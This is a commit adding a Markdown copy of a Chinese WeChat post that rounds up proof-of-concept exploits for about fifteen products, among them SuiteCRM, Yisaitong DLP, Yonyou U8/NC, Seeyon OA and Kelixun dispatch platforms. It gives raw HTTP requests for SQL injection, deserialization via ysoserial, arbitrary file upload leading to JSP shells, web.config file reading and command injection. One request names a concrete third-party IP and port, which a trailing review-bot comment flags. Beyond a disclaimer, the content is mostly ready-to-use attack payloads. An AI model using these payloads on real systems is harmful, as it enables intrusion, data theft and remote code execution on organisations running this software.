Commit
Upload new file: 2024HW 情报合集(二)附 poc.md via simpread
Showing 1 changed file with 214 additions and 0 deletions.
@@ -0,0 +1,214 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/clB6P1_DT4eMuURPMv-FBg) | ||
**免责声明** | ||
|
||
<table width="677"><tbody><tr><td valign="top" rowspan="5" colspan="1"><strong><strong>本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!</strong></strong></td></tr><tr></tr><tr></tr><tr></tr><tr></tr></tbody></table> | ||
|
||
各位大师傅不好意思,经发现下面 poc 有错,已增加和更新部分 poc。 | ||
|
||
一、SuiteCRM responseEntryPoint 存在 SQL 注入漏洞 | ||
|
||
``` | ||
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Connection: keep-alive | ||
``` | ||
|
||
二、亿赛通数据泄露防护 (DLP) 系统 NetSecConfigAjax 接口存在 SQL 注入漏洞 | ||
|
||
``` | ||
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 | ||
Host: | ||
Content-Type: application/x-www-form-urlencoded | ||
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- | ||
``` | ||
|
||
三、亿赛通数据泄露防护 (DLP) 系统 NoticeAjax 接口存在 SQL 注入漏洞 | ||
|
||
``` | ||
POST /CDGServer3/NoticeAjax;Service HTTP/1.1 | ||
Host: | ||
Cache-Control: max-age=0 | ||
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" | ||
Sec-Ch-Ua-Mobile: ?0 | ||
Sec-Ch-Ua-Platform: "Windows" | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Sec-Fetch-Site: cross-site | ||
Sec-Fetch-Mode: navigate | ||
Sec-Fetch-User: ?1 | ||
Sec-Fetch-Dest: document | ||
Referer: | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Priority: u=0, i | ||
Connection: close | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 98 | ||
command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'-- | ||
``` | ||
|
||
四、用友 U8 Cloud MonitorServlet 存在反序列化漏洞 | ||
|
||
``` | ||
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser | ||
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 | ||
payload | ||
``` | ||
|
||
五、用友 NC 系统 blobRefClassSearch 接口中 pk_org 参数的 sql 注入漏洞 | ||
|
||
poc 暂未公布。 | ||
|
||
六、用友 NC querygoodsgridbycode 存在 SQL 注入漏洞 | ||
|
||
``` | ||
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 | ||
Host: | ||
Accept-Encoding: gzip, deflate | ||
Upgrade-Insecure-Requests: 1 | ||
Pragma: no-cache | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Cache-Control: no-cache | ||
``` | ||
|
||
七、通天星 CMSV6 车载定位监控平台 disable 存在 SQL 注入 | ||
|
||
``` | ||
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 | ||
``` | ||
|
||
八、通天星主动安全监控云平台远程代码执行漏洞 | ||
|
||
poc 暂未公布。 | ||
|
||
九、润乾报表 InputServlet 存在任意文件上传漏洞 | ||
|
||
``` | ||
POST /InputServlet?action=12 HTTP/1.1 | ||
Host: 120.55.41.98:6868 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | ||
Content-Type: multipart/form-data; boundary=00contentOboundary00 | ||
Connection: close | ||
Content-Length: 238 | ||
--00contentOboundary00 | ||
Content-Disposition: form-data; | ||
1024 | ||
--00contentOboundary00 | ||
Content-Disposition: form-data; /\..\\..\\..\12.jsp" | ||
Content-Type: image/jpeg | ||
test | ||
--00contentOboundary00-- | ||
``` | ||
|
||
十、天问物业 ERP 系统 AreaAvatarDownLoad 存在任意文件读取漏洞 | ||
|
||
``` | ||
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | ||
``` | ||
|
||
十一、 致远 OA fileUpload.do 前台文件上传绕过漏洞 | ||
|
||
1、上传图片马,返回 fileid 值 | ||
|
||
``` | ||
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30) | ||
Content-Length: 754 | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
png | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
--00content0boundary00 | ||
Content-Disposition: form-data; | ||
false | ||
--00content0boundary00 | ||
Content-Disposition: form-data; Content-Type: Content-Type: application/pdf | ||
<% out.println("hello");%> | ||
--00content0boundary00-- | ||
``` | ||
|
||
2、修改文件后缀为 jsp | ||
|
||
``` | ||
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 | ||
Host: | ||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 | ||
Content-type: application/x-www-form-urlencoded | ||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) | ||
Content-Length: 64 | ||
method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp | ||
``` | ||
|
||
十二、福建科立讯通信 指挥调度平台 invite_one_member 存在远程命令执行漏洞 | ||
|
||
``` | ||
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Connection: keep-alive | ||
``` | ||
|
||
十三、福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞 | ||
|
||
``` | ||
POST /app/ext/ajax_users.php HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info | ||
Content-Type: application/x-www-form-urlencoded | ||
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- - | ||
``` | ||
|
||
十四、福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞 | ||
|
||
``` | ||
/app/ext/ajax_users.php | ||
``` | ||
|
||
十五、锐捷 RG-NBS2026G-P 交换机 WEB 管理 ping.htm 未授权访问漏洞 | ||
|
||
``` | ||
/safety/ping.htm | ||
``` | ||
|
||
关注公众号:**实战安全研究** |
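Review bot: the request in section 九 carries a concrete address and port, `Host: 120.55.41.98:6868`, while every other request in this file leaves `Host:` blank; replace it with a blank or an obviously labelled placeholder before merging, since a public repository should not record what looks like a live third-party host. Separately, GitHub flags this file as containing bidirectional Unicode text; before merging, confirm that the only non-ASCII content is the Chinese prose and headings, and that no hidden bidi control characters sit inside the fenced request lines, where they would render one way and be copied another.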